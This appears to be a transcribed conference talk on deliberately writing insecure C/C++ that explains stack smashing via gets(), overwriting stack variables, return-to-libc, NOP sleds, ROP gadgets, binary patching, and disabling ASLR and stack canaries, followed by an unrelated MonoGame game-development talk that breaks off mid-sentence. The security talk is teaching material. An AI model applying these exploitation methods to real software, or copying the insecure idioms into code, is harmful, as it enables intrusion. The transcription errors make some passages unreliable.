I was executing it. And then we go into print. We just follow the same thing, point it to the string, save the return address, save the previous stack frame, print it, and then we get into gets, which is the culpate here. Now, the reason why we get this problem is, of course, gets doesn't have any idea about how many characters it's allowed to write. So depending on how many you are writing, it's just going to continue poking stuff into memory. And any input eight characters or more will cause a problem. And this is exactly the stack data that I got when I executed this on my machine. And most of this stack is basically just padding to make sure that things are aligned properly in memory. So it doesn't really matter what kind of values are there. But we recognize with some training at least, you look at the stack frame and the stack data and you start recognizing that this is the return address. This is the pointer to the stack frame. This is allow access and missiles response and pointed to the response buffer. So by focusing on the stack variables, per se, this is what happened when I typed in global thermal nuclear war. Okay. And now we partly have an explanation for why we got, how much is it? One billion missiles because this number is 1.8 billion. And, but we are also close to see why this happened. Access granted and access denied. And it's because of this one. The 6C here. And the first time I saw this, I was kind of surprised. That's, I think it was two years ago when 6, when GCC 471 came out. It was the first time I saw this particular issue. But I studied the assembler code. It was blogged by Mark Schroyer first. And I continued in his direction and I studied the assembler code. And what I saw was that GCC and my compiler in this particular case basically said that a bool is always either zero or one and never anything else internally in memory. So if someone messes up so that it's neither zero or one, you get this behavior. This is sort of a sampler of the C code. Because when you read the assembler, you see that in order to decide whether you should do access granted or not, it basically says, is allow access not zero? Then I'm going to allow grant access. And the next thing in the sampler code is that if allow access is not one, then I'm going to deny access. And if for some reason allow access becomes anything but zero or one, you get this kind of quantum behavior in your code. And this is not limited to bool. This happens all the time when you mess up the internal data structures inside of your program. So by allowing in some way memory overrides, you can also get this very, very strange and surprising behavior like this. So going back to our understanding of how the stack is working on my particular machine, we also see that now we can write a small script printf unix command, where we basically just send in eight characters because we don't care anyway. And then we type in two a, put that into end missiles, and then we put in one to allow our self access. And that gives us launching 42 missiles and operation complete. And now we have a way of controlling the program. But using scripts like this is not a very effective way of exploiting. So it's perhaps more common to see exploits, for example, written in C or Python, for example, that are in this case, building up a structure that is exactly the same as the stack on that particular machine. And now we can programmatically say, I want to allow access to be true, I want end mass missiles to be 42. And then I'm just writing this into the place where I can kind of put the payload or this is not really a payload, but where I can put the data and really control how the program is working. Yeah. So now we see we have a programatical way to do it. But we perhaps we also see a new opportunity now. What about this one? This was the return address. This is the place where it's supposed to jump when it's finished with a function. Hmm. What would happen now if we write an exploit more like this? We still, we increase our struct because we're going to map a bigger part of the stack on the target. So we still allow access. We launched three missiles. But now we are poking also in the particular address for where this function is supposed to return. So it's, we are not, we are saying I don't want you to go necessarily to put operation complete when you're finished. I want you to do something else. And in this case, this particular address happened to be pointing to the beginning of authentic at the launch again. And now I have a way to, I've changed the path, the execution path of the program in such a way that it's basically launching more and more missiles and just for fun. I'm increasing the number of missiles every time. So four, five, six, seven, eight, nine missiles should be launched. And this is called arc injection. It's not very often used like this going back to your own function. What it's more used, typically more used for is to jump into one of the library routines. So, for example, first you push, you push the address to a string that you have poked into memory somewhere. And then you change the return address and jump into a libc function, for example, system. And suddenly you can invoke Unix commands inside of the program. And that's the reason why arc injection is often called return to libc because that's where it's mostly used to jump into libc. Any questions around that? Yeah? No? Feel free to stop me during the talk. So now we have looked at arc injection and return to libc, which is a very common way of exploiting a program. But we are not limited to that because we can also let the compiler generate another compiler, perhaps generate some values, a small program that we can put on the stack. And in this case, I've just written a small function and compiled it with gcc. I already get all kind of the hex values that I need to know so that now I can take this, create a string with these hex values, and I can write it on the stack, and I can jump to that location in memory and start executing code. So this is another way of doing arc injection. You inject some code first and then you jump to that code. Sometimes it's difficult to kind of calculate exactly where you should start. So it's very common to use a knob slide where you have thousands and thousands of no operation knobs first so that it doesn't really matter where you are hitting because you will hit somewhere and then the execution will just do no, no, no, no, no, no, and then suddenly execute your code. And that's what is called a knob slide. So can I demonstrate code injection? Well, it used to be very easy to do so back in the old days. And that's the reason why I said in the last 10 years because while it was easy to do it on the Commodore 64 and the early 8080 machines, etc., early PCs, for the last 10 years there has been this annoying data execution protection mechanism which is using a write or execute strategy, sometimes called an XPIT, where it basically says when a program or operating system is asking for a page of memory, it has to say, is this going to be data or is it going to be executable code? And it cannot be both. And this mechanism is very effective to prevent the possibility of executing a code that is stored in the data segment and not in a code segment or a code page. So, but it's not the only protection mechanism out there that is useful to know about. There are plenty of them, but they are often easy to turn off. And one of them is called address, space, layout randomization. And it also became common on major operating systems like, I'm not sure, five, six, seven years ago. So, now all the regular operating systems tend to implement it. And that basically says that before we had the situation where when you execute to the program, it tends to always go into the same place in memory. All the addresses were the same. So, the stack were at the same place, the global, the functions were approximately the same place and also the library routines were at the same place. But with ASLR enabled, then every time the operating system is loading a program into memory, it tends to put them in different places. So, it becomes slightly more difficult to guess where things are in memory. So, it's more difficult to kind of jump into a particular function, etc. Now, this is considered to be a very kind of minor obstacle because there are so many ways you can do information leakage. You can first get the information of where things are stored in memory and then you can calculate exactly where it needs to be. So, while it's slightly annoying, it's not considered to be a very, very strong mechanism. And also, in order for ASLR to work, you need to have compiled with position independent code and position independent executable. And this is not on by default in typical compilers. So, you have to explicitly say, I want position independent code for ASLR to work. And often, people are not willing to pay that 10% extra, well, 10-ish percent extra price of having position independent code. So, but there are many ways of disabling it. You can even poke stuff into your kernel where you basically say, no, I don't want ASLR anymore. You can boot up your machine without ASLR. And of course, you can make sure that your code is not position independent. Here is another mechanism, which is called Stack Protector, often. And that one is injecting a so-called Stack Canary. Stack Canary. Here is the Stack Canary. So, the body of the function is the same, but in the preamble, just before executing the body, it's poking, yeah, supposed to be random value into a memory location and XORing that one. And then when it's exiting the function, it's checking, has this canary died, has it changed? And if it's changed, then it's just going to, the program is going to terminate. So, at least it doesn't continue in an invalid state. And this is enabled by doing minus f Stack Protector, which is often default on modern compilers, because this is not a very costly operation, because the Stack Canary only comes into functions that actually do have a potential for doing buffer overflows. So, it's not something that, it's not the cost you have to pay for every function. But not only does it put in this magic value, but it also moves around, often it moves around the variables. So, in this case, the response buffer is at a higher address than it was before. And that is nice, because it means if you are overwriting it, you can't, it's difficult to change allow access and admissance. And this is a deliberate strategy that they are using, putting that kind of the vulnerable buffer at an high address. And some people have actually suggested that we can solve all the security issues if we start making our execution Stack grow up instead of down. I never understood that proposal, and it seems like there is a, it's not a very popular suggestion out there, but it's interesting thought of that you can the position of your Stack variables depends on how easy it is to exploit the program. But finally, when you have of the protection mechanisms, we have this data execution prevention, Stack protectors, SLR and similar techniques, they certainly make it difficult to hack into a system. But there is a very powerful exploit technique called return oriented programming that has become very popular in the last few years. I think the first paper around Rop came out in 2006, 2007, but it became common to use it only a few years ago. And according to someone that knows this much better than myself, Rop is used in nearly every single exploit that you hear about these days. And it's a very powerful technique and it's apparently impossible to stop it. And the reason is how a machine is working and how we are executing code. I take my binary now, which is called launch, and I just dump the data on that binary file. And by studying that data, I start recognizing a few things here that is very useful for Rop. Anyone know what these are? C6? Not loop? Oh, it's not no operation either. It can be used for jump, that's the point. It's actually the RET instruction. It's a RET instruction. And there are other useful instructions out there that you can use, but the nice thing about RET is that it's reading from stack and address. And moving it into the EIP, the instruction pointer. And in that way, you can build up a lot of addresses on the stack. And when you start unwinding the stack doing returns, it will just pick another return address and jump around. And I show you these things. You usually have programs, and this is called Rop Gadget. There are millions of those programs out there, which can look at the binary and then figure out, here are all the small bits and pieces of code that is unintentionally in your binary. For example, if I want to just to show you a very simple example, just before I return back to main, for some reason, I want to increment ECX. I just want to run this small kind of assembly instruction ECX and then return. Then I can put this address onto stack first, and then have the real return address afterwards. And then it will first jump there, run int ECX, then run return, and jump back to main. And it has increased ECX by one, as if nothing has happened. But you're not limited to do it one. You can actually build up a chain of these gadgets that are each doing a small little assembly instruction. And it has been shown on, I think it's on Intel, ARM, and Spark CPUs. It has been shown that there is often a Turing complete set of these gadgets on the programs that are running on them. So it is possible to imagine that by finding these gadgets and creating a long chain of small bits and pieces that is going to execute by just reading the stack and doing return, return, return, return, but just before the return doing a small thing, you can build up a whole program in there. And this is the technique that is often used. And it's very difficult to do by hand. So you typically always use programs, like in this case, ROP gadgets, which can also, it can find the gadgets and it can chain them together for you if you want something to do a particular command. And then you have the payload that you can just dump into your target program. Yeah? Yes, you want to get around the no execute program. So you basically, you create your program as just a long string of data. And then you let original program jump around in its own executable doing all these small pieces of instructions. So that's what return-oriented programming do. And just one of the more famous stories around return-oriented programming, and probably one of the stories that made it kind of famous and magazines and newspapers were writing about it. Some researchers into return-oriented programming that asked for access to the new vaulting machine that we're using in the States, which had, I don't know how many hundred security researchers employed to kind of create a really secure machine. And they used this technique and they showed that they could actually exploit the vaulting machine that was just designed to be unbreakable. And so far, there are very few suggestions on how to protect programs from exploit by return-oriented programming. So back to more, well, this is what I showed now, is very realistic, but now to something slightly different. Here is a case which I find very, very interesting. And now that I know more about this one and similar cases, I see this all over the place and code bases. Now, this function, which is of course contrived because it's small and I have to put it on the page. But there is a fairly common idiom here. And that is, in this function, we are given a pointer and an offset and an end of the buffer that the pointer is pointing at. And then a value to poke into it. So just to be kind of secure, first we check if pointer plus offset is bigger than end because then we have an auto-bond. That's not good. The next thing we do, now the offset is an unsigned value, but still we can have this kind of wrap going on. So if it's a very large value, you can imagine that pointer plus offset becomes less than pointer and that gives you, oh, it's a wrap. And that's not good. We don't want that. So we return and if everything is okay, we are confident that okay, we are within the buffer, then we poke the value in. And according to the researchers that the paper that I read about this, it was published, the one I read was published in November last year. This is a very common idiom also in what we would consider serious software. So they found a lot of, for example, Linux programs, even in kernel modules that use this as an idiom for checking for wraps. But the problem is, and this is the auto-bond guard and this is the wrap guard. So if we compile this without optimization, it works exactly as it is supposed to work. So we give it some large numbers. It's poking into the buffer. Then it detects, oh, we are out of buffer. And since we use very large initial values, we get this wrap now. And yeah, so this seems to work. But with optimization, this happens. Out of bounds, out of bounds. And now it's just poking into memory. So why is that? And this is something that you will see more and more of when you have code that has been working for a decade or two. And then suddenly a new optimization technique comes in. And it starts reasoning more, better and better around your code. And in this case, there was a new version of a few compilers that came out where they figured out that this can never happen. I mean, this is, first of all, pointer overflow is undefined behavior in C. So this is not going to happen anyway. So why should we generate code for something that will never happen? So if you look at the assembler here, it looks like this and without going into details on that one, what has basically happened is that it's a, well, this can never happen. So it just deleted it. This code is not present in the assembler. And this is something that you see over and over again that the optimizers that become smarter and smarter and suddenly they remove code that you thought, oh, that's useful code. The compiler is smarter than you and say, if that is going to be true or that is going to be false, then there must be undefined behavior. Of course, you're not doing undefined behavior. Are you? So I just remove it. You want fast code? That's the reason why you write in C and C++. And the research paper, they claims that there were like 200 modules or something like that in the Linux code that used this idiom or that idiom was used in 200 places. I can't remember exactly the numbers, but it's a common thing. And I see it in our code basis as well. It's something that people do. And you might say, oh, that's inconceivable. It should never happen. But as long as you're stepping outside of the rules for the language, then anything can happen. So I have some more stuff about security because security comes typically in layers, very much in layers. You put several layers of security on protection mechanisms on top. And in this case, we might go into the source code and we might start trying to fix and use F gets instead of gets, et cetera. But it's easy to forget that the easiest way to find the information you need is if you have the binary, you just search for the strings inside, of course. I mean, it's silly, but I still have to mention it here because you can have all these protectionism in place. And suddenly you realize you have actually leaked the password or you have leaked information. Similarly, if you have access to the binary, you can just disassemble the binary and you can read the authenticate and launch function and you can read how it works. And then we recognize, oh, that's two missiles, isn't it? And that is not allowing access. I can just use said and I can patch that binary file on those two places and then run it. And suddenly we have access granted whatever we do and we always launch 42 missiles. So that's also one way of doing it. If you're doing embedded applications, for example, sending out firmware to somewhere and you allow someone to change the firmware before they upload it into your router or switch or whatever. Well, that can happen. So yeah, so we recognize this thing. So that is a nice way of patching it. And you can also patch complete functions, of course. So here I write my own my authenticate and launch David rocks launch 1983 missiles. Here is the assembler code machine code. We just create a printf with that particular thing. And they poke it directly into the memory. And as long as the function is smaller than the previous function, it's typically a very easy thing to do. You don't have to move things around or anything. You just replace the function completely. Now we're doing our stuff here without any fancy way of hacking into the system. So I just wanted to mention those before we go into the summary finale, I'm not going to give 13 14 tricks about how to write insecure code in CNC plus plus. First of all, this one. It's very common for programmers to think that they know which one will be called first. Oh, it's going to call a and then be. And that is true for all languages except from CNC plus plus. In CNC plus plus, it can either call a first or be first. The only guarantee you have it's that they are not going to execute at the same time. And this is called unspecified behavior. Actually, co ball now for trying also has this feature, but all the other languages that you know about probably will have a left to right evaluation. So trick number one, make sure that you write code that this is bending on a particular evaluation order. This is trick for writing insecure code, of course. Now, unspecified evaluation order has some serious consequences, very serious consequences. And that is what is the value of n. Any suggestions? Yeah, it's undefined behavior. It can be 42, it can be zero, it can be seven, it can be whatever. And even if you have seen your own compiler generating exactly the same value over and over and over again, doesn't mean that it will do so in the future. And it certainly doesn't mean that it will do so if you change the compiler. So this is an example of a sequence point evaluation and you get undefined behavior. So trick number two, try to break the sequencing rules that will give you some cool effects. And I'm showing you that one in the next one. This one, for those who have been to a previous talk about, and I've probably seen this one before, so you don't need to answer. But I think we have time to very briefly look at this. What do you think will actually happen if you run this code, or compile, and run this code in your development environment without picking up your computer? Just try to guess. You have some experience with your own development environment. What do you think your compiler will do? I'm quite sure this will compile and this will run cleanly. So you don't need to look for semicons or whatever missing semicons. It's going to print the value. What do you think it will print? First one. Second one. Seven. I like that. Anything else? Eleven. I like that as well. Anyone higher? Yeah? 15? Oh, 21. That's even better. Anyone higher? Well, this is what happened on my computer. I have many compilers on my computer. So I just happened to pick three interesting ones. If I use the GCC that came with the operating system, not the one that I compile myself, which I do all the time, the one that came with the operating system, GCC gives me 12, Clang gives me 11, and Intel Compiler gives me 13. This is a consequence of the unspecified evaluation order, and therefore the expression that you see here doesn't make sense because we don't know whether I has been updated here or there or there, or when the side effect of plus plus i actually happens. Yes? You are ahead of me. Good. So trick number three, write insecure code where the result depends on the compiler. And if you want a detailed explanation with all the assembler involved, here is the link. So if you enable warnings for code like this, I don't know how many flags you want. So to write insecure code, it's important to know a lot about the weak spots, the blind spots of your compiler, because there is always one annoying colleague that wants to add another flag. Oh, I want minus f, whatever. So know your blind spots, and the compilers will typically not, well, they will try to warn you about things, but very often they can't see it, and sometimes they can see it, but they have decided that I'm not going to warn anyway to diagnose this. And remember when you have undefined behavior, and that's what we saw, we saw undefined behavior, and that's the reason why the compilers can just do whatever they want. Anything can happen. There is this saying on constancy that when a compiler encounters a kind of an illegal construct, it can try to make demons fly out of your nose. That's okay behavior. And this is what we see in this particular example. I'm not going to spend time on that one because we already discussed slightly this Boole problem earlier. But the point is that if you have code like this, and the problem is we don't initialize B, but we are still reading it. So that means B in theory can be whatever value, or in practice can be whatever value. So if you just put on a main and a bar here, just to poke, for example, the value two into this memory location, remember how the stack was working on my machine. Then we get the situation where it's trying to evaluate B that has an internal representation of something that is not zero or one. And the compilers that behave differently. The Intel compiler in this case will give through, clang will give false, and GCC have this quantum behavior and gives me both through and false at the same time. So maybe this is the first preparation for quantum computing. With optimization that just happened to all of them happened to do false. So this is also you see an example where the value changes completely with optimization as well. And it's different between the compilers. And once again, I described two concepts in this 90 minute talk that I did at Acura last year with all the assembler involved, and it was the previous one and it was this one. So if you want to see all the assembler code and explanation for why this is happening, then you can go there and have a look. So write insecure code by messing up the internal state of the program. Now this one, anyone see a problem with this function? Apart from being stupid and doing nothing serious? I mean, we're quite used to write the function that takes an integer and do something with that integer and then return something. So this is innocent looking code. But there is a problem. We can get integer overflow. Because if we send in a large value, in this case int max, then we get signed integer overflow and that is undefined behavior in c and c++. So and you remember when you have undefined behavior, anything can happen. So this might happen. Of course, you might say, well, unlikely. But remember, anything can happen. Even that thing, even though I would be surprised if it actually happened, it was a real phenomenon. But in theory, anything can happen. So make sure you write insecure code by only assuming input valid input values. Don't check for large integers before you're doing calculations with it because that will make your code more secure and less buggy. Number seven, trick number seven, now trick number eight, this one. Now I have a small loop that is basically looping through i. And I've already given you a small hint about what might happen here. But this one terminates after doing four calculations and printing out for values, which is fine. That is what you would expect maybe. But if you combine with optimization, this can happen. And this actually happens on my machine. So what looked like a valid terminating condition is not a valid terminating condition in this case. Because this thing can never be true. No, it can never be anything but true. We are doing additions and signed integer overflow is not allowed. So either it's crappy code or this can never be anything but true. So the compiler will change it to true and therefore eliminate the code. If you have a good compiler, though, lousy compilers, they don't see these kind of things. So write insecure code by letting the optimizer remove apparently critical code for you. And here is a big topic. And there are plenty of C++ examples as well I could have used. What is the big problem here? It's of course the use of this one. It looks like a kind of a secure way of copying things. And it has a very bad name, but it was invented like 220 years ago, so they didn't think that far. Just kidding about 220 years. But the point is that true and copy is not doing what you think it does. Because it's not null terminating the string. So if you write a large string, for example, if you write global term, in this case, you are filling up the buffer. And it's going to stop there. It's not going to do the buffer overwrite as, for example, true copy would have done or whatever. But it's going to truncate it without null terminating. So the effect is that when you print it out, it will continue after the string and into the next buffer and you get this information leakage. Whenever you see true and copy, you should expect to find this line afterwards. And if you don't find that afterwards, you are probably looking at a bug. So you can just scan through your source code, look for string and copy, and if you don't see that terminating thing afterwards, you're probably looking at the bug. So write insecure code by using library functions incorrectly. And of course, you should never allow the stack protector to kick in so you can disable it with minus ethanol stack protector. Disable it. You should also make sure that ASLR is not working. You can either turn it off or you can compile your code as not position independent. That's useful. And make sure you use an old hardware and old operating systems like five, six, seven years old machines and operating systems because if you're lucky, they don't have this data execution prevention. It's an X bit in place. So go back a few years. Use those kind of old stuff. And here is another one. The difference, I've just showed an example here where I compile my program with using shared libraries and one with static libraries. And that makes a huge difference in the size of the program. So you see, in this case, it's only 7K and this one, it's 780K. The cool thing about that is that the larger the file is, the more gadgets you can find. So if you want to do ROP, you want to have a huge program that has a lot of kind of random data in there so you can find a lot of gadgets that you can chain together and start exploiting the program. Make it easy to find ROP gadgets in your program. And you should not check the integrity of the code. So you should not do checksum. When you distribute the code, you should certainly not do a checksum when you load the program and install it on your machine and start running it because that would make it difficult to kind of do patching of the binaries. So skip the integrity checks. And finally, perhaps most important, you must never, ever let other programings review your code. So pair programming, forget about that. Never review code because your colleagues might see all the crap that you are creating. So that was the advice for writing insecure code. And here is the summary. And thank you very much. So we are out of time, but I will hang around here a bit and if you want to ask about something particular here.
|
Let's turn the table. Suppose your goal is to deliberately create buggy programs in C and C++ with serious security vulnerabilities that can be "easily" exploited. Then you need to know about things like stack smashing, shellcode, arc injection, return-oriented programming. You also need to know about annoying protection mechanisms such as address space layout randomization, stack canaries, data execution prevention, and more. This session will teach you the basics of how to deliberately write insecure programs in C and C++. Warning: there will be lots of assembler code in this talk.
|
10.5446/50857 (DOI)
|
OK, hefyd, hi allwch. I'm Richard Garside, I'm a freelance developer. In my spare time when I can't find anyone to pay me money to do work, I make games and other little side projects. So, who here learnt how to programme when they were kids so they could make games? Me, too. Who actually made any games past the age of about 18? I sort of stopped. Maybe around 18, 19, 20, and I started sort of, I got a serious job and stopped all that sort of stuff. I went through quite a golden age of computer games as a kid. I went from Chuckie Egg to Sonic the Hedgehog, all the way up to Tomb Raider. When Chuckie Egg was on, I was thinking I could make this, I could make Chuckie Egg, I could be a games programmer. This is quite exciting. And then the budgets around games got bigger and bigger, you got Grand Theft Auto, and I started to think that maybe game programming wasn't really for me. I didn't want to be part of one of those massive teams. I just wanted to sort of make stuff myself. And I was never really going to be able to make something like a Tomb Raider that people actually wanted. But two things recently changed our mind over the last year. One happened a little while ago, and that was sort of mobile games, and you found people playing on things like Chuckie Egg on their mobile phones again. And things, things getting really popular. Maybe I could make those, but still sort of left it to the side a little bit. And then I saw a brilliant film called Indie Game the Movie. Here we go. And I'm also wearing the t-shirt. And it says, this is a lovely film. It sort of follows some small teams, a sort of like one guy, two guys making a game. It doesn't hold any punches about how stressful actually making something for a deadline for a real sort of thing can be. But they were guys who were really proud of what they were doing, really excited. And it sort of made me think, oh, maybe I could start getting back into game development again. And I had a few ideas, and that's when I sort of started up again. So this talk is going to be about monogame. And monogame is a quite a nice simple framework, but there are lots of really quite big games actually that have been made in monogame. So just talk you through some of those. Oh no, too fast. Do this thing. There we go. So Fez was done with monogame. And it's an absolutely beautiful game. This is a game called Armed, which is another 3D game. It's all available on Windows 8. This is a game called Transistor. And then by far the best game ever to have been made with monogame is this one called Tower Blocks, made by very talented developer. And it's got amazing music. So it's basically a 3D version of Tetris, and this is the game that I've made. It's not been the massive success I would hope. So I figured my only chance of actually getting people to download this and maybe get it to the flappy birds level I'm hoping for is to travel the world telling people individually about it. As you leave, there are some stickers by the sort of the voting green, red, yellow thing. So you can take a sticker, can download my game, give me an unfairly high rating on iTunes. That would be good. But it's sort of... It shows one of the nice things about monogame, which I've written the code once, but I've got it working on iOS, Windows 8, and Windows Phone 8. Hopefully Android soon as well. I made this game, I was very pleased with myself, was bitterly disappointed that it wasn't becoming the massive success that it deserved to be. And then I saw this game. And this game is called Monument Valley. And it's beautiful. It's an absolutely beautiful game. And I was blown away by how beautiful it was and how much art and craft had gone into it. And it was a massive success and it absolutely deserved to be. And I went back to look at my game and was like, fair enough. Maybe I've got a lot to learn. And it's actually, I've been programming for 20 years, but I've only really been making games in my spare time for the last year. And it is an art form. And maybe, I guess one's a really nice thing recently about business projects versus art projects. Now a business project is a success if you make your money back. But an art project is successful if you're really proud of it and it's really beautiful. And I think anything can be an art project. And maybe that's really sort of, it was kind of my motivation for doing it in the first place. I really enjoyed making it. I haven't become financially rich and wealthy, but that is to come, obviously. But maybe game two, game three, as I improve in these sort of things, I'll sort of get there. So... Is this where we are? Yes, we're going to get on to 3D, but very quickly first we're going to have to cover all of 2D. Who here has used Mono Game before? So a few of you, and have you used 2D or 3D? Three. Three. Okay, so well. The 2D stuff is... Actually, who here went to Roon's Talk on 2D and physics? Okay, so I'm going to cover all of Roon's Talk in the next 5, 10 minutes. Yeah, but showing that his talk was rubbish. So Mono Game has... When you start a new project, you'll get something very much like this. Except your game won't be called Dialect Game, it'll be called Game One. There are... I'll just minimise these so you can see them. There are just a few methods. And these sort of form the main part of it. There are sort of two main stages of a game running. The first is sort of loading and initialising. So we go through the constructor, initialise and loading content. And that's done fairly quickly. And then for the rest of the game, it's constantly looping through what is called the game loop between this update method and this draw method. And that sort of... The faster it can do that, the higher the frame rate for your game will be. And draw is purely just draw stuff to screen and update is anything you need to actually move the positions of things or, you know, take input from the user, find out that someone's died or that the score has increased, all those sort of things. That happens in update and then draw. And it sort of goes around those as quickly as possible. Now, in this first... So the first thing you need to do is load content. And contents are... Or content can be anything, but for this very simple 2D demo, we're just going to be looking at loading a texture which will form part of our sprite. So MonoGame has a content manager accessible by content. And you do content.load, you tell it what sort of content you want to load, and then the file name. The file name is over here, which is... Files are also in a folder called content. And... So here's my content folder. And you can see I've got various images in there and a Dalek, which we will see shortly. So that's where all the content is coming from. Now, I'm storing my textures just as PNG files. They need to be a power of 2 wide. So, you know, 64, 128, 256. Not on all platforms, but on some they do. So you sort of safer to keep them that way. And I'm just loading my dragon texture in there, and I'm storing it in a global variable called texture. I'm not doing the update to it, so we're not moving. So all I'm doing is drawing him to screen. And the first thing I'm doing is I'm clearing the screen. So every time I'm looping round, I'm clearing the screen and setting just a blank background colour, which is going to be dark green. And then there's a sprite batch, and the sprite batch sort of just contains all your sprites that you're going to draw. And it's interesting to just pass it three simple parameters. One is the texture that you've loaded. And the next is a two-dimensional vector which stores its position on screen. And its position on screen is from the top left-hand corner, so it's the X along and the Y down. So I've just got it 100 across and 100 down. The colour dot Y just means you're not going to fiddle with the colours. You just want them as they are in the actual texture. So then we will run this in the iPhone retina, 4-inch thing. And there we go. So basically that's Roon's talk. He also had some physics in his talk, but essentially he showed us... He was moving. Yeah, his dragon was moving, and it was doing cool things, and there were bubbles. But bubbles are boring. So now we have a lovely 2D texture. It's just shown in 2D space. There's no 3D there. So that's basically all you need to know for drawing 2D graphics. And I sort of stayed away from 3D for quite a long time. I sort of wanted to do it. I remember at university we had a little make a game project. I tried to make robots fighting each other game, and it was rubbish. And some other guys made a submarine game. And it looked brilliant because they just had this 3D submarine floating through a little world. The game was actually really boring, but it looked beautiful, and the submarine model was really simple. But I was like, oh, those guys are amazing. They've done 3D, I couldn't possibly do that. Far too difficult. And there's lots of things that you get... Make you think it might be hard. There's 3D models, there's textures. On the programming side, there are matrices, and matrices just look horrendous, and I'm quite scared of them. I'm still quite scared of them. Shaders...actually, we're not going to cover shaders because I am still scared of shaders, but next time I do this talk, I'll be able to tell you all about shaders, and hopefully they're not quite as scary as they look. So those are the sort of things that you need to know about 3D. The artwork side, and that's always difficult in a game, is finding someone or learning those skills yourself to do the actual artwork stuff. But one of the really nice things about 3D is that actually quite simple 3D models can look really impressive, and seeing something rotating and moving 3D space realistically, and having some nice lighting effects on it looks amazing, and you don't actually have to be that good at drawing to get that sort of effect. So no, on that one. Too many monitors gets confusing. There we go, back to here. So what we're going to do is we're going to take something like a nice two-dimensional shape, but we're going to show it in 3D. So we're going to...I've written a little...actually, sorry, back up a little bit. To draw three-dimensional stuff, you need two things. You need a three-dimensional model, and a camera. A camera is responsible for taking that three-dimensional thing and working out how to turn that into a two-dimensional object that can get displayed on your screen, where the angles are, what works, what sides the show. So those are the two things. You need a camera and a 3D model. So first of all, let's load up another texture to show on our thing. So texture equals content.load. And again, this is just going to be a 2D texture like before. I called it slide. But now the two-dimensional texture itself is not enough. We're going to need something to put it on. We're going to need a two-dimensional plane. So I've created a class which I'll go and explain shortly called texture plane. Under slide equals new texture plane. There it is. And this needs to know about the graphics device, which is an underlying thing that Monagang gives you, which is also used by the sprite batch. Nope, I don't understand my shortcuts. I apologise. Graphics. There it is. It's like a problem with the tool tip is hiding the code I was looking at. Next, it's looking for the texture, which we've just loaded up in the line below, the line above, sorry. It's not a world matrices to sort of place it. You don't need to provide that. That's optional. So I will leave that for the moment. And again, we will come back to it. So we've got a two-dimensional texture, and we've placed it on this little sort of flat surface that we can place in 3D space. The next part is we need to load up a camera. So I have a camera. And again, camera is a class I've created, and we'll come and explain exactly how that works shortly. But it's not as complicated as it might seem. So I'm just going to go camera. It calls new camera. And it wants four things. And the first three things are to do with where the camera is positioned. Now, before we were looking at two-dimensional vectors that were positioned something in two-dimensional space, now we're looking at 3D vectors with three dimensions to them, so x, y and z. And the three things the camera wants to know is where the camera is. So where the... Well, the cameraman, if there was such a thing in your computer game, is holding the camera. Secondly, the target, where he's pointing it. And next, which way is up? Is he sort of standing that way, or is he lying down while filming it? So the position is... We'll just... The three, and we'll have it... So that means we're standing sort of x, y, z. Zero will go... Zero along the x will go up on the y, so I'll float 15 into the air. And then the z-axis means I'm becoming towards you, so I'll come towards 15. So that's where the camera is. And then I'm going to look at what is known as the origin, which is where x, y and z are all zero, and you can use a handy little shortcut for that, vector 3.0. Up, you just need a vector which sort of has the number in the correct one, so I want up to be y. But again, there's a handy shortcut for this, vector 3.up. Now, there is... It doesn't care that much exactly where up is. It doesn't like... So if you think about the camera pointing that way, up should ideally be at a right angle to it, but if you sort of go down, you don't have to work out exactly where the right angle is. What you shouldn't do, which I have discovered to my cost and it's taken me several hours to work out why, is have the up exactly pointing the opposite way to which you are looking, because nothing will appear on the screen. You'll have no idea why. You'll start to panic. And three or four hours later, you'll be sort of hitting your head against a wall when you realize what you've done. So that's sort of the setting of the camera. And then the next part is it needs to know how big the screen is, and that comes in the game window. So... Window. There we go. And that's just a property provided to you by the underlying game class that I've inherited from, which is, as you can see, just there. So that's one of the things you get for free out of mono game. It will work out this screen resolution for you. So that's our camera. And then we just need to draw it to screen. So, slide.draw. And it wants the camera, because the camera will help it draw itself to screen. Yeah. Nope. Do-do-do. And we've drawn something to screen, but now you can see what I've done is I've drawn it far too big. So this is one of the things we can use to create a matrices for to transform that. Now, as I said before, matrices are sort of one of the things that scared me off 3D programming. They're these sort of grids of numbers. You multiply them together, and you multiply this number by that number, then this number by that number, and then you've done it wrong and you have to start again. But all that's done by the computer, really. You don't need to know what the specific matrix is for a particular thing. You just need to know that this group of numbers will help you, and it will do something, and you need to know the correct one to use. And you can use the sort of built-in constants in monogame to get the correct one for you and to sort of generate those. So, when we made our texture plane here, it was asking for a third parameter, which was a matrix. It's asking for the world matrix. And in 3D gaming, the world matrix is the thing that places your object in the world. You have a little object in a 3D sort of program somewhere that you've made, and it's sat around zero, zero, zero on the origin. But when you come to play, you actually put it in your 3D world, you want to move it. So, the world matrix is the matrix that puts it into the world. So, let's create a matrix that's going to scale our object, scale matrix and make it smaller, so we can actually see it. And we just use matrix. As soon as you type dot create, you start to see, if you spell it right anyway, all these different matrices you can create for various different transformation functions. So, we're going to scale, and I've written down somewhere the right, there we go. We're going to scale it by a factor of 0.005. And then we're going to pass in that scale matrix into there. And now... We can see the 3D isn't that hard at all, except I'm going to shatter that by now showing you the plane class, this plane matrix, not plane matrix, flat plane. So, in my little extras folder, texture plane. So, this is a class which takes just four vertices, and vertices are sort of the points, and draws them to screen. But it does so using vertex position textures, and sort of you have to set where the position is coordinated to it, and then you have to create a vertex buffer. And I copied and pasted this code, and I don't fully understand it, but it isn't actually so bad, but even if you were just drawing a cube, this would quickly become out of hand. So, I don't really recommend drawing vertex buffers for anything simpler than quite straightforward shapes, because it's a much easier way. You can use a model which you've generated in something like Blender, and you can import that in, and you don't have to have these endless arrays of vertices and work out how to break up your model into triangles, because you can't just give it four points. You have to actually sort of decompose that into triangles, and work out what it would be as a triangle. So, I wouldn't recommend using this, but you can see that it has the world matrix, and it sort of has just a draw function like before, but we won't go too much into that. We'll go more into how to draw when we come to loading a model, which is a much nicer way. So, you'll see that actually 3D is quite easy. So, on to sort of 3D models. Now, for my... you've got a few nice free options, actually, when it comes to making your own 3D models. There's Google Sketchup, which is quite nice and simple, and if you want to make some sort of simple stuff, then I'd probably recommend that, because it hasn't got a steep learning curve, and you can do pretty much quite a lot of stuff with it. My dad's an architect, and he actually loves Sketchup for doing little sort of quick plans of houses and stuff, because it's just really quick, and they're sort of the name Sketchup. It's kind of like 3D sketching. It's still a bit of a learning curve to it, but much easier than the other alternative, which is Blender. Now, Blender is amazing, but it's sort of... it's kind of made for pros. There's lots. You need a three-murton mouse. There's quite a lot of keyboard 